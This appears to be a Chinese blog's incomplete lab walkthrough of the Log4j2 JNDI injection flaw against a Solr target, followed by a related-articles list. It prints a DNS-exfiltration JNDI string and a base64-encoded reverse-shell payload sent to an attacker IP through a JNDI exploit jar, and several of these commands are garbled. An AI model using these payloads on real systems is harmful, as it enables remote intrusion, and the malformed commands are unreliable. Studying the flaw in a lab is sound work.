当前位置: 首页 > news >正文

log4j2漏洞练习(未完成)

      log4j2 是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响的版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响。

      打开靶场后,我们进入这样的一个页面,在/solr/admin/cores的目录下可以上传参数,构造一个参数:${jndi:dns://${sys:java.version}.example.com},其中example.com是从dnslog中随机获取的一个地址

我们将参数提交访问后回到dnslog页面刷新查看就会得到版本信息

然后我们准备尝试反弹shell,先构造pyload

ash -i >& /dev/tcp/http://123.57.239.114/8888 0>&1
//反弹shell,ip为攻击机ipYXNoIC1pID4mIC9kZXYvdGNwL2h0dHA6Ly8xMjMuNTcuMjM5LjExNC84ODg4IDA+JjE=
//编码后的反弹shelljava -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C "bash -c{echo,[经过base64编码后的命令]}{base64,-d}|bash"-A 「你的vpsip]
//命令模板java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash -c {echo,YXNoIC1pID4mIC9kZXYvdGNwL2h0dHA6Ly8xMjMuNTcuMjM5LjExNC84ODg4IDA+JjE=}|{base64,-d}|bash" -A 123.57.239.114
//最终pyload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -i 192.168.116.128

运行后显示如下代码

http://www.lryc.cn/news/411367.html

相关文章:

  • 常见网络攻击方法原理、应用场景和防御方法(一)
  • 【leetcode十分钟】覆盖所有点的最少矩形数目(C++思路详解)
  • 【Vue3】默认插槽
  • 华清day4 24-7-31
  • 搜维尔科技:Manus VR数据手套-适用于机器人、人工智能和机器学习解决方案
  • 知识文库杂志知识文库杂志社知识文库编辑部2024年第12期目录
  • 【Linux网络编程】套接字Socket
  • es之must、filter、must_not、should
  • RocketMQ消息发送基本示例(推送消费者)
  • 23 MySQL基本函数、分组查询、多列排序(3)
  • PHP与SEO,应用curl库获取百度下拉关键词案例!
  • MySQL:子查询
  • C++—— IO流
  • vue+node后台处理大文件切片上传--前端部分
  • 【通俗理解】艺术与数学交融
  • 深入探讨 Docker 容器文件系统
  • 《LeetCode热题100》---<4.子串篇三道>
  • 全国区块链职业技能大赛样题第9套前端源码
  • 如何提高编程面试成功率:LeetCode Top 100 问题及解答解析(详细面试宝典)
  • K-近邻和神经网络
  • 用EasyV全景图低成本重现真实场景,360°感受数字孪生
  • 【Golang 面试 - 进阶题】每日 3 题(九)
  • 孟德尔随机化、R语言,报错,如何解决?
  • 一文剖析高可用向量数据库的本质
  • JavaScript青少年简明教程:异常处理
  • 科普文:Lombok使用及工作原理详解
  • 飞致云开源社区月度动态报告(2024年7月)
  • mybatis-plus——实现动态字段排序,根据实体获取字段映射数据库的具体字段
  • redis:Linux安装redis,redis常用的数据类型及相关命令
  • JavaScript 和 HTML5 Canvas实现图像绘制与处理